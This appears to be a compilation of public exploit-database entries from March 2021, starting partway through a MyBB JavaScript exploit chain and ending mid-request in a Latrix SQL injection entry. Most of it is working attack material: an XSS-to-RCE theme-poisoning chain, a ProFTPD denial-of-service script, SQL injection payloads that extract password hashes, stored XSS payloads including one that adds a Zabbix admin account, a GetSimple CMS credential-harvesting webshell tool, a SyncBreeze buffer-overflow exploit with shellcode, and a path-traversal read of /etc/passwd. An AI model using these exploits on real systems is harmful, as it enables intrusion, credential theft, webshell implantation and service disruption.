function set_as_default(token, tid) {
var request = new XMLHttpRequest();
request.open('GET', '/admin/index.php?module=style-themes&action=set_default&tid=' + tid + '&my_post_key=' + token);
request.onload = function() { trigger(); };
request.send();
}
// Get the TID of the downloaded theme payload
// Stage: 5
function get_payload_tid(token) {
var request = new XMLHttpRequest();
request.open('GET', '/admin/index.php?module=style-themes');
request.responseType = "document";
request.onload = function() {
var response = request.response;
var aTags = response.getElementsByTagName("a");
var searchText = "payload";
var found;
for (var i = 0; i < aTags.length; i++) {
if (aTags[i].textContent == searchText) {
found = aTags[i];
break;
}
}
var href = found.getAttribute("href");
var urlParams = new URLSearchParams(href);
var tid = urlParams.get("tid");
set_as_default(token, tid);
};
request.send();
}
// We pass the actual request to upload the template exploiting the second link of the exploit chain
// Stage: 4
function upload_template(token) {
var request = new XMLHttpRequest();
request.open('POST', '/admin/index.php?module=style-themes&action=import');
var data = new FormData();
data.append('my_post_key', token);
data.append('local_file', build_payload(), PAYLOAD_XML_NAME + ".xml");
data.append('import', 0);
data.append('url', '');
data.append('tid', '1');
data.append('name', "payload");
data.append("version_compat", 1);
data.append("import_stylesheets", 1);
data.append("import_templates", 1);
request.onload = function() {
// After uploading the template, set it as default to poison the cache
get_payload_tid(token)
};
request.send(data);
}
// Build the rogue XML Template exploiting SQL Injection leading to RCE through PHP evaluation.
// Stage: 3
function build_payload() {
var xmlDom = document.implementation.createDocument("", "", null);
var theme = xmlDom.createElement("theme");
theme.setAttribute("name", PAYLOAD_XML_NAME);
theme.setAttribute("version", PAYLOAD_XML_VERSION);
var properties = xmlDom.createElement("properties");
theme.appendChild(properties);
var template_set = xmlDom.createElement("templateset");
template_set.innerHTML = SQL_PAYLOAD;
properties.appendChild(template_set);
xmlDom.appendChild(theme);
var serialized = new XMLSerializer().serializeToString(xmlDom);
var result = XML_PROLOG + serialized;
var file = new File([result], PAYLOAD_XML_NAME);
return file;
}
// Acquire the anti-CSRF token
// Stage: 2
function acquire_token(request) {
var response = request.response;
var token = response.getElementsByName("my_post_key")[0].value;
if(token == null) {
/* ACP Session either expired or wasn't established to begin with */
return;
}
// We have acquired the anti-CSRF token now.
upload_template(token);
}
// ACP Code Execution
// Stage: 1
function exec_acp() {
var request = new XMLHttpRequest();
request.open('GET', 'admin/index.php?module=style-themes&action=import');
request.responseType = "document";
request.onload = function() {
acquire_token(request);
};
request.send();
}
// We hide the payload, to raise less suspicions
// Stage: 0
function hide() {
var getAll = document.querySelectorAll("[src*='http://xyzsomething.com/image?)<a href=']");
getAll.forEach(element => {
var pNode = element.parentNode.innerText="lmao whatever you say";
});
}
// Entry point of the exploit
function start() {
hide();
exec_acp();
}
start();
# Exploit Title: ProFTPD 1.3.7a - Remote Denial of Service
# Date: 22/03/2021
# Exploit Author: xynmaps
# Vendor Homepage: http://www.proftpd.org/
# Software Link: https://github.com/proftpd/proftpd
# Version: 1.3.7a
# Tested on: Parrot Security OS 5.9.0
#-------------------------------#
#encoding=utf8
#__author__ = XYN/Dump/NSKB3
#ProFTPD Denial of Service exploit by XYN/Dump/NSKB3.
"""
ProFTPD only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
(if it's limited, just run this script from different proxies using proxychains, and it will work)
"""
import socket
import sys
import threading
import subprocess
import time
banner = """
._________________.
| ProFTPD |
| D o S |
|_________________|
|By XYN/DUMP/NSKB3|
|_|_____________|_|
|_|_|_|_____|_|_|_|
|_|_|_|_|_|_|_|_|_|
"""
usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])
def test(t,p):
s = socket.socket()
s.settimeout(10)
try:
s.connect((t, p))
response = s.recv(65535)
s.close()
return 0
except socket.error:
print("Port {} is not open, please specify a port that is open.".format(p))
sys.exit()
def attack(targ, po, id):
try:
subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#print("Worker {} running".format(id))
except OSError: pass
def main():
global target, port, start
print banner
try:
target = sys.argv[1]
except:
print usage
sys.exit()
try:
port = int(sys.argv[2])
except:
port = 21
try:
conns = int(sys.argv[3])
except:
conns = 50
print("[!] Testing if {0}:{1} is open".format(target, port))
test(target, port)
print("[+] Port {} open, starting attack...".format(port))
time.sleep(2)
print("[+] Attack started on {0}:{1}!".format(target, port))
def loop(target, port, conns):
global start
threading.Thread(target=timer).start()
while 1:
for i in range(1, conns + 3):
t = threading.Thread(target=attack, args=(target,port,i,))
t.start()
if i > conns + 2:
t.join()
break
loop()
t = threading.Thread(target=loop, args=(target, port, conns,))
t.start()
def timer():
start = time.time()
while 1:
if start < time.time() + float(900): pass
else:
subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
t = threading.Thread(target=loop, args=(target, port,))
t.start()
break
main()
# Exploit Title: MyBB 1.8.25 - Poll Vote Count SQL Injection
# Exploit Author: SivertPL (kroppoloe@protonmail.ch)
# Date: 20.03.2021
# Description: Lack of sanitization in the "votes[]" parameter in "Edit Poll" causes a second-order semi-blind SQL Injection that is triggered when performing a "Move/Copy" operation on the thread.
# Sofware Link: https://resources.mybb.com/downloads/mybb_1825.zip
# CVE: CVE-2021-27946
References:
1) https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums
2) https://vuldb.com/?id.171307
3) https://github.com/mybb/mybb/commit/aa415f08bce01f95a8319b707bb18eb67833f4c1.patch
In order to trigger the vulnerability, you must have permission to edit polls.
Moderators and administrators can usually do it, but in some configurations regular users can do it as well.
In case you are a moderator, the vulnerability can be used as privilege escalation provided you crack the resulting salted hash.
Otherwise, you are free to use CVE-2021-27889 to impersonate the target moderator to trigger this SQL Injection from an external .js script which will perform the necessary
injections automatically, and send the resulting hashes to your server.
This is a pretty nasty vulnerability to exploit by hand (at least on regular, most common MySQL setup), but can be dangerous in the hands of
a very determined attacker who combines it with CVE-2021-27889 and an automated Javascript-Based SQL Injector.
This vulnerability might however allow for devastating execution of stacked queries when databases such as PostgreSQL or MS-SQL are used.
In such cases, the entire system is compromised as a result (an attacker can UPDATE the admin password and replace it with his own hash).
Guide:
1) Make a thread with a public poll, with multiple choices.
2) Vote on at least one choice.
3) Go to the "Edit poll" section of the poll.
4) Place the following payload in the "vote count" input (any entry within the votes[] parameter in the resulting POST request).
1','2',ascii((select version())),'0','0','1','1') -- -a
5) Save the poll.
6) Perform a "Move/Copy" operation on the thread, moving it to a different forum, or making a copy in the same forum.
This is where the SQL Injection is triggered, and you should see an SQL Error here if the payload is incorrect.
7) Go to the copied/moved version of the thread (you should be redirected there automatically).
8) Go to the "Show Results" section of the poll.
9) The total vote count under the poll is our 64 bit unsigned integer covert channel to retrieve information from the ascii select query.
Since this vulnerability is semi-blind, you can only retrieve the output of the SELECT query as an unsigned integer (hence we use ASCII()).
Other parameters in the INSERT query that we are injecting into are either too small, or unfeasible.
Unsigned integer provides enough space to extract required data when enough requests are made.
In this case, the number is the ASCII code of the first character of the result of the injected select version() query.
This way we can transfer the output through this covert channel, one character at a time.
In order to extract the admin hash, one has to either perform many requests (so it's best to automate it), or find a better way to convert a substring varchar to int.
1','2',ascii((substring((SELECT password FROM mybb_users WHERE username="sivertpl"), 2, 1))),'0','0','1','1') -- -a
1','2',ascii((substring((SELECT password FROM mybb_users WHERE username="sivertpl"), 3, 1))),'0','0','1','1') -- -a
1','2',ascii((substring((SELECT password FROM mybb_users WHERE username="sivertpl"), 4, 1))),'0','0','1','1') -- -a
1','2',ascii((substring((SELECT password FROM mybb_users WHERE username="sivertpl"), 5, 1))),'0','0','1','1') -- -a
... etc.
This will send the ASCII codes of every char of the hashed password through the integer covert channel.
10) After sending enough requests, you should have the hashed admin password. Repeat the entire process to acquire the salt.
# Exploit Title: Hotel And Lodge Management System 1.0 - 'Customer Details' Stored XSS
# Exploit Author: Jitendra Kumar Tripathi
# Vendor Homepage: https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=13707&title=Hotel+and+Lodge+Management+System+using+PHP+with+Source+Code
# Version: 1
# Tested on Windows 10 + Xampp 8.0.3
XSS IMPACT:
1: Steal the cookie
2: User redirection to a malicious website
Vulnerable Parameters: Customer Details
*Steps to reproduce:*
1: Log in with a valid username and password. Navigate to the Customer Details (http://localhost/hotel/source%20code/index.php) on the left-hand side.
2: Add the new customer and then add the payload <script>alert(document.cookie)</script>in Customer Name parameter and click on save button. Post Saved successfully.
3: Now, XSS will get stored and trigger every time when you click view customer and the attacker can steal authenticated users' cookies.
# Exploit Title: ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path
# Exploit Author : SamAlucard
# Exploit Date: 2021-03-21
# Software Version : ActivIdentity 8.2
# Vendor Homepage : https://www.hidglobal.com/
# Tested on OS: Windows 7 Pro
# ActivIdentity was Acquired by HID Global in Octuber 2010
#ActivClient is a desktop authentication software that uses smarts cards and readers
# for enterprise, government and commercial establishments
#Analyze PoC :
==============
C:\Users\DSAdsi>sc qc ac.sharedstore
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: ac.sharedstore
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Common
Files\ActivIdentity\ac.sharedstore.exe
GRUPO_ORDEN_CARGA : SmartCardGroup
ETIQUETA : 0
NOMBRE_MOSTRAR : ActivIdentity Shared Store Service
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem
# Exploit Title: ELAN Touchpad 15.2.13.1_X64_WHQL - 'ETDService' Unquoted Service Path
# Exploit Author : SamAlucard
# Exploit Date: 2021-03-22
# Vendor : ELAN Microelectronics
# Version : ELAN Touchpad 15.2.13.1_X64_WHQL
# Vendor Homepage : http://www.emc.com.tw/
# Tested on OS: Windows 8
#This software installs EDTService.exe, version 11.10.2.1
#Analyze PoC :
==============
C:\>sc qc ETDService
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: ETDService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Elantech\ETDService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Elan Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# Exploit Title: Hi-Rez Studios 5.1.6.3 - 'HiPatchService' Unquoted Service Path
# Dicovery by: Ekrem Can Kök
# Discovery Date: 2021-03-22
# Vendor Homepage: https://www.hirezstudios.com
# Version: 5.1.6.3
# Tested on: Windows 10 Pro x64
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\" | findstr /i "HiPatchService" | findstr /i /v """
Hi-Rez Studios Authenticate and Update Service HiPatchService C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe Auto
# Service info:
C:\>sc qc "HiPatchService"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: HiPatchService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Hi-Rez Studios Authenticate and Update Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.
# Exploit Title: Budget Management System 1.0 - 'Budget title' Stored XSS
# Exploit Author: Jitendra Kumar Tripathi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14403/budget-management-system.html
# Version: 1
# Tested on Windows 10 + Xampp 8.0.3
XSS IMPACT:
1: Steal the cookie
2: User redirection to a malicious website
Vulnerable Parameters: Customer Details
*Steps to reproduce:*
Add Budget Title
Payload : <script>alert(1)</script>
Reload the http://localhost/Budget%20Management%20System/index.php or update the budget , the xss will get triggered.
# Exploit Title: GetSimple CMS 3.3.16 - Reflected XSS to RCE
# Exploit Author: Bobby Cooke (boku)
# Discovery Credits: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
# Date: March 29th, 2021
# CVE ID: CVE-2020-23839 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-23839
# Vendor Homepage: http://get-simple.info
# Software Link: http://get-simple.info/download/
# Version: v3.3.16
# Tested against Server Host: Windows 10 Pro + XAMPP
# Tested against Client Browsers: Firefox(Linux), Chrome (Linux & Windows), Edge
# Full Disclosure & Information at: https://github.com/boku7/CVE-2020-23839
# Vulnerability Description:
# GetSimple CMS v3.3.16 suffers from a Reflected XSS on the Admin Login Portal. On August 12th, 2020, the vendor received full disclosure details of the vulnerability via private email. The vulnerability was publicly disclosed on September 13th, 2020 # via MITRE with the publication of CVE-2020-23839, which contained little details and no proof of concept. On January 20th, 2021 full disclosure and code analysis was publicly disclosed under the GetSimple CMS GitHub active issues ticket.
# Exploit Description:
# This exploit creates a Reflected XSS payload, in the form of a hyperlink, which exploit CVE-2020-23839. When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, a sophisticated exploitation # attack-chain will be launched, which will allow the remote attacker to gain Remote Code Execution of the server that hosts the GetSimple CMS system.
# Attack Chain:
# 1. Attacker tricks GetSimple CMS Admin to go to the URL provided from this exploit
# 2. Admin then enters their credentials into the GetSimple CMS login portal
# 3. Reflected XSS Payload triggers onAction when the Admin clicks the Submit button or presses Enter
# 4. The XSS payload performs an XHR POST request in the background, which logs the browser into the GetSimple CMS Admin panel
# 5. The XSS payload then performs a 2nd XHR GET request to admin/edit-theme.php, and collects the CSRF Token & Configured theme for the webpages hosted on the CMS
# 6. The XSS payload then performs a 3rd XHR POST request to admin/edit-theme.php, which injects a PHP backdoor WebShell to all pages of the CMS
# 7. The exploit repeatedly attempts to connect to the public /index.php page of the target GetSimple CMS system until a WebShell is returned
# 8. When the exploit hooks to the WebShell, an interactive PHP WebShell appears in the attackers console
import sys,re,argparse,requests
from urllib.parse import quote
from colorama import (Fore as F, Back as B, Style as S)
from time import sleep
FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
def bullet(char,color):
C=FB if color == 'B' else FR if color == 'R' else FG
return SB+FB+'['+ST+SB+char+SB+FB+']'+ST+' '
info,err,ok = bullet('-','B'),bullet('-','R'),bullet('+','G')
def webshell(SERVER_URL):
try:
WEB_SHELL = SERVER_URL
getdir = {'FierceGodKick': 'echo %CD%'}
r = requests.post(url=WEB_SHELL, data=getdir, verify=False)
status = r.status_code
cwd = re.findall(r'[CDEF].*', r.text)
if cwd:
cwd = cwd[0]+"> "
term = SB+FG+cwd+FT
print(SD+FR+')'+FY+'+++++'+FR+'['+FT+'=========>'+ST+SB+' WELCOME BOKU '+ST+SD+'<========'+FR+']'+FY+'+++++'+FR+'('+FT+ST)
while True:
thought = input(term)
command = {'FierceGodKick': thought}
r = requests.post(WEB_SHELL, data=command, verify=False)
status = r.status_code
if status != 200:
r.raise_for_status()
response = r.text
print(response)
else:
r.raise_for_status()
except:
pass
def urlEncode(javascript):
return quote(javascript)
def genXssPayload():
XSS_PAYLOAD = '/index/javascript:'
XSS_PAYLOAD += 'var s = decodeURIComponent("%2f");'
XSS_PAYLOAD += 'var h = "application"+s+"x-www-form-urlencoded";'
XSS_PAYLOAD += 'var e=function(i){return encodeURIComponent(i);};'
XSS_PAYLOAD += 'var user = document.forms[0][0].value;'
XSS_PAYLOAD += 'var pass = document.forms[0][1].value;'
XSS_PAYLOAD += 'var u1 = s+"admin"+s;'
XSS_PAYLOAD += 'var u2 = u1+"theme-edit.php";'
XSS_PAYLOAD += 'var xhr1 = new XMLHttpRequest();'
XSS_PAYLOAD += 'var xhr2 = new XMLHttpRequest();'
XSS_PAYLOAD += 'var xhr3 = new XMLHttpRequest();'
XSS_PAYLOAD += 'xhr1.open("POST",u1,true);'
XSS_PAYLOAD += 'xhr1.setRequestHeader("Content-Type", h);'
XSS_PAYLOAD += 'params = "userid="+user+"&pwd="+pass+"&submitted=Login";'
XSS_PAYLOAD += 'xhr1.onreadystatechange = function(){'
XSS_PAYLOAD += 'if (xhr1.readyState == 4 && xhr1.status == 200) {'
XSS_PAYLOAD += 'xhr2.onreadystatechange = function(){'
XSS_PAYLOAD += 'if (xhr2.readyState == 4 && xhr2.status == 200) {'
XSS_PAYLOAD += 'r=this.responseXML;'
XSS_PAYLOAD += 'nVal = r.querySelector("#nonce").value;'
XSS_PAYLOAD += 'eVal = r.forms[1][2].defaultValue;'
XSS_PAYLOAD += 'xhr3.open("POST",u2,true);'
XSS_PAYLOAD += 'xhr3.setRequestHeader("Content-Type", h);'
XSS_PAYLOAD += 'payload=e("<?php echo shell_exec($_REQUEST[FierceGodKick]) ?>");'
XSS_PAYLOAD += 'params="nonce="+nVal+"&content="+payload+"&edited_file="+eVal+"&submitsave=Save+Changes";'
XSS_PAYLOAD += 'xhr3.send(params);'
XSS_PAYLOAD += '}};'
XSS_PAYLOAD += 'xhr2.open("GET",u2,true);'
XSS_PAYLOAD += 'xhr2.responseType="document";'
XSS_PAYLOAD += 'xhr2.send();'
XSS_PAYLOAD += '}};'
XSS_PAYLOAD += 'xhr1.send(params);'
XSS_PAYLOAD += '%2f%2f'
return XSS_PAYLOAD
def argsetup():
about = SB+FT+'This exploit creates a Reflected XSS payload, in the form of a hyperlink, which exploit CVE-2020-23839. When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, a sophisticated exploitation attack-chain will be launched, which will allow the remote attacker to gain Remote Code Execution of the server that hosts the GetSimple CMS system.'+ST
parser = argparse.ArgumentParser(description=about)
parser.add_argument('TargetSite',type=str,help='The routable domain name of the target site')
args = parser.parse_args()
return args
if __name__ == "__main__":
print(SB+FB+'Exploit Author'+FT+': '+FB+'Bobby Cooke'+FT+FB)
print(SB+FR+' CVE-2020-23839 '+FT+'|'+FR+' GetSimpleCMS v3.3.16 '+FT)
print(FR+'Reflected XSS '+FT+'->'+FR+' CredHarvest Payload '+FT+'->'+FR+' XHR Chaining '+FT+'->'+FR+' RCE'+ST)
args = argsetup()
RHOST = args.TargetSite
WEBAPP_URL = RHOST+'/admin/'
WEBAPP_URL = WEBAPP_URL+'index.php'
PAYLOAD = genXssPayload()
ENCODED_PAYLOAD = urlEncode(PAYLOAD)
print(info+FT+'Have a '+SB+FB+'GetSimpleCMS '+SB+FC+'Admin '+ST+'go to this '+SB+FM+'URL & login'+ST+', and you will get an '+SB+FR+'RCE WebShell'+ST)
print(SB+FB+WEBAPP_URL+ENCODED_PAYLOAD+ST)
sleep(1)
print(ok+'Waiting for Admin to login with creds, which will trigger the RCE XHR attack chain..')
while True:
sleep(1)
webshell(RHOST)
# Exploit Title: SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow
# Date: 03/27/2021
# Author: Filipe Oliveira - filipecenturiao[at]hotmail.com Rafael Machado - nnszs[at]protonmail.com
# Vendor: https://www.syncbreeze.com/
# Software Link: https://www.4shared.com/file/57pE4sZfiq/syncbreeze_setup_v10116.html
# Version: SyncBreeze v10.1.16 x86
# Tested on: Windows 10 x64 (19042.867)
# CVE: CVE-2017-15950
Usage: The exploit will generate a POC file, called xplSyncBreeze.xml. Launch the application and click on Import Command, then load the POC file.
# -*- coding: utf-8 -*-
import struct
# badchars
#\x00\x0a\x0d\x20\x27
#\x81\x82\x83\x84\x85\x86\x87\x88
#\x89\x8A\x8B\x8C\x8D\x8E\x8F\x90
#\x91\x92\x93\x94\x95\x96\x97\x98
#\x99\x9A\x9B\x9C\x9D\x9E\x9F\xA0
#\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8
#\xA9\xAA\xAB\xAC\xAD\xAE\xAF\xB0
#\xB1\xB2\xB3\xB4\xB5\xB6\xB7\xB8
#\xB9\xBA\xBB\xBC\xBD\xBE\xBF\xC0
#\xC1\xC2\xC3\xC4\xC5\xC6\xC7\xC8
#\xC9\xCA\xCB\xCC\xCD\xCE\xCF\xD0
#\xD1\xD2\xD3\xD4\xD5\xD6\xD7\xD8
#\xD9\xDA\xDB\xDC\xDD\xDE\xDF\xE0
#\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8
#\xE9\xEA\xEB\xEC\xED\xEE\xEF\xF0
#\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8
#\xF9\xFA\xFB\xFC\xFD\xFE\xFF
# Shellcode payload size: 432 bytes
# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=EAX -b '\x00\x0A\x0D\x20\x27' -v shellcode -f python
shellcode = b""
shellcode += b"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x6b\x4c\x69"
shellcode += b"\x78\x4e\x62\x75\x50\x77\x70\x35\x50\x45\x30"
shellcode += b"\x4b\x39\x59\x75\x55\x61\x39\x50\x52\x44\x4e"
shellcode += b"\x6b\x42\x70\x50\x30\x6e\x6b\x42\x72\x54\x4c"
shellcode += b"\x6c\x4b\x70\x52\x74\x54\x4c\x4b\x62\x52\x66"
shellcode += b"\x48\x44\x4f\x48\x37\x61\x5a\x51\x36\x45\x61"
shellcode += b"\x39\x6f\x6e\x4c\x75\x6c\x43\x51\x71\x6c\x65"
shellcode += b"\x52\x56\x4c\x47\x50\x4b\x71\x38\x4f\x74\x4d"
shellcode += b"\x37\x71\x49\x57\x38\x62\x7a\x52\x52\x72\x36"
shellcode += b"\x37\x4c\x4b\x63\x62\x42\x30\x6c\x4b\x31\x5a"
shellcode += b"\x57\x4c\x4c\x4b\x32\x6c\x36\x71\x31\x68\x4a"
shellcode += b"\x43\x47\x38\x47\x71\x4a\x71\x76\x31\x6c\x4b"
shellcode += b"\x36\x39\x67\x50\x66\x61\x58\x53\x4c\x4b\x70"
shellcode += b"\x49\x66\x78\x59\x73\x34\x7a\x53\x79\x6e\x6b"
shellcode += b"\x50\x34\x4c\x4b\x66\x61\x4e\x36\x55\x61\x39"
shellcode += b"\x6f\x4c\x6c\x4a\x61\x4a\x6f\x34\x4d\x67\x71"
shellcode += b"\x48\x47\x67\x48\x69\x70\x71\x65\x59\x66\x54"
shellcode += b"\x43\x63\x4d\x79\x68\x75\x6b\x73\x4d\x67\x54"
shellcode += b"\x44\x35\x79\x74\x72\x78\x4e\x6b\x53\x68\x71"
shellcode += b"\x34\x57\x71\x5a\x73\x52\x46\x6c\x4b\x36\x6c"
shellcode += b"\x72\x6b\x6c\x4b\x76\x38\x75\x4c\x67\x71\x68"
shellcode += b"\x53\x6e\x6b\x57\x74\x4e\x6b\x63\x31\x78\x50"
shellcode += b"\x6f\x79\x73\x74\x47\x54\x64\x64\x53\x6b\x31"
shellcode += b"\x4b\x63\x51\x50\x59\x63\x6a\x43\x61\x39\x6f"
shellcode += b"\x59\x70\x73\x6f\x31\x4f\x62\x7a\x4e\x6b\x44"
shellcode += b"\x52\x6a\x4b\x4e\x6d\x53\x6d\x73\x5a\x63\x31"
shellcode += b"\x4c\x4d\x4d\x55\x6f\x42\x75\x50\x47\x70\x33"
shellcode += b"\x30\x46\x30\x50\x68\x74\x71\x6c\x4b\x42\x4f"
shellcode += b"\x6e\x67\x39\x6f\x6e\x35\x6f\x4b\x58\x70\x78"
shellcode += b"\x35\x79\x32\x46\x36\x33\x58\x79\x36\x4c\x55"
shellcode += b"\x4f\x4d\x6d\x4d\x39\x6f\x6a\x75\x55\x6c\x63"
shellcode += b"\x36\x61\x6c\x45\x5a\x6d\x50\x49\x6b\x39\x70"
shellcode += b"\x32\x55\x75\x55\x6d\x6b\x57\x37\x64\x53\x74"
shellcode += b"\x32\x52\x4f\x50\x6a\x53\x30\x61\x43\x59\x6f"
shellcode += b"\x78\x55\x73\x53\x30\x61\x30\x6c\x72\x43\x43"
shellcode += b"\x30\x41\x41"
# padding to crash buffer
basura = struct.pack('<L', 0x41414141) * 390
# gadgets to move payload pointer into EAX
GAD1 = struct.pack('<L', 0x65235465) # XCHG EAX,EBP
GAD2 = struct.pack('<L', 0x6506537C) # CALL EAX
# padding to reach buffer address stored in ebp
basura2 = struct.pack('<L', 0x41414141) * 56
# padding for stack pivot
padding = struct.pack('<L', 0x41414141) * 4
padding2 = struct.pack('<L', 0x41414141) * 20
# stack pivot to reach an area with more space for gadgets on the stack
# 0x6506491c: add esp, 0x48 ; pop edi ; pop esi ; ret
pivot = struct.pack('<L', 0x6506491c)
# final payload
fruta = basura + pivot + padding + padding2 + GAD1 + GAD2 + basura2 + shellcode
# write payload to xml file
payload = open("xplSyncBreeze.xml", "wb")
payload.write("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n".encode('utf-8'))
payload.write("<sync name='".encode('utf-8'))
payload.write(fruta)
payload.write("'>\n</sync>\n".encode('utf-8'))
payload.close()
# Exploit Title: Novel Boutique House-plus 3.5.1 - Arbitrary File Download
# Date: 27/03/2021
# Exploit Author: tuyiqiang
# Vendor Homepage: https://xiongxyang.gitee.io/
# Software Link: https://gitee.com/novel_dev_team/novel-plus,https://github.com/201206030/novel-plus
# Version: all
# Tested on: linux
Vulnerable code:
com/java2nb/common/controller/FileController.java
@RequestMapping(value = "/download")
public void fileDownload(String filePath,String fileName, HttpServletResponse resp) throws Exception {
String realFilePath = jnConfig.getUploadPath() + filePath;
InputStream in = new FileInputStream(realFilePath);
fileName = URLEncoder.encode(fileName, "UTF-8");
resp.setHeader("Content-Disposition", "attachment;filename=" + fileName);
resp.setContentLength(in.available());
OutputStream out = resp.getOutputStream();
byte[] b = new byte[1024];
int len = 0;
while ((len = in.read(b)) != -1) {
out.write(b, 0, len);
}
out.flush();
out.close();
in.close();
}
Guide:
1. Log in to background management
2. http://xxxx/common/sysFile/download?filePath=../../../../../../../../../../../../../../../../../etc/passwd&fileName=passwd
# Exploit Title: Zabbix 3.4.7 - Stored XSS
# Date: 30-03-2021
# Exploit Author: Radmil Gazizov
# Vendor Homepage: https://www.zabbix.com/
# Software Link: https://www.zabbix.com/rn/rn3.4.7
# Version: 3.4.7
# Tested on: Linux
# Reference -
https://github.com/GloryToMoon/POC_codes/blob/main/zabbix_stored_xss_347.txt
1- Go to /zabbix/zabbix.php?action=dashboard.list (anonymous login CVE-2019-17382)
2- Create new dashboard
3- Add a new widget => Type: Map nabigation tree
4- Past into parameter "Name": <img src="x" onerror="var n='hck',q=jQuery;q.post('users.php',{sid:q('#sid').attr('value'),form:'Create+user',alias:n,name:n,surname:n,'user_groups[]':7,password1:n,password2:n,theme:'default',refresh:'9s',rows_per_page:9,url:'',user_type:3,add:'Add'});">
5- Click to "Add" button
# Exploit Title: Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting
# Date: 3/30/2021
# Exploit Author: cmOs
# Vendor Homepage: https://openlitespeed.org/
# Software Link: https://openlitespeed.org/kb/install-from-binary/
# Version: 1.7.9
# Tested on Ubuntu 20.04
Step 1: Log in to the dashboard using the Administrator account
Step 2: Go to Listeners > Summary > Actions (View) > Edit
Step 3: Inject XSS_Payload to "Notes" parameter
Step 4: Graceful Restart
Step 5: Trigger XSS when Administrator click on Default Icon
[POC]
POST /view/confMgr.php HTTP/1.1
Host: 127.0.0.1:7080
Connection: close
Content-Length: 163
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://127.0.0.1:7080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://127.0.0.1:7080/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: LSUI37FE0C43B84483E0=325275ee1caf0c970c4ae7960d30f0a6;
litespeed_admin_lang=english; LSID37FE0C43B84483E0=kWLbCk%2F0XX0%3D;
LSPA37FE0C43B84483E0=I%2Fpkx%2FeQg4s%3D
name=Default&ip=ANY&port=8088&reusePort=&secure=0¬e=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&a=s&m=sl_Default&p=lg&t=L_GENERAL&r=Default&tk=0.04356800+1617073257
# Exploit Title: Latrix 0.6.0 – 'txtaccesscode' SQL Injection
# Date: 03/30/2021
# Exploit Author: cptsticky
# Vendor Homepage: https://sourceforge.net/projects/latrix
# Software Link: https://sourceforge.net/projects/latrix/files/latest/download
# Version: 0.6.0
# Tested on: Ubuntu 20.04
POST /latrix/inandout.php HTTP/1.1
Host: 18.222.194.190
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: http://18.222.194.190
Connection: close
